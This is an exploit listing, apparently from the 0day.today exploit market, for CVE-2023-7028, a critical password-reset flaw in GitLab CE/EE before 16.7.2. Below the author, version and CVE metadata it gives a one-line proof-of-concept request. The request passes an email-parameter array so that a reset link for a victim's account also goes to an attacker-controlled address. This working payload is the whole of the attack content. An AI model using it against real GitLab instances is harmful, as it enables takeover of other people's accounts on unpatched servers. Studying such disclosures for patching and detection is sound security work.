[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

GitLab CE/EE < 16.7.2 - Password Reset Vulnerability

Author
0xB455
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-39456
Category
remote exploits
Date add
14-03-2024
CVE
CVE-2023-7028
Platform
java
# Exploit Title: GitLab CE/EE < 16.7.2 - Password Reset
# Exploit Author: Sebastian Kriesten (0xB455)
# Twitter: https://twitter.com/0xB455
# Vendor Homepage: gitlab.com
# Vulnerability disclosure: https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
# Version: <16.7.2, <16.6.4, <16.5.6
# CVE: CVE-2023-7028

Proof of Concept:
user[email][]=valid@email.com&user[email][]=attacker@email.com

#  0day.today [2024-06-02]  #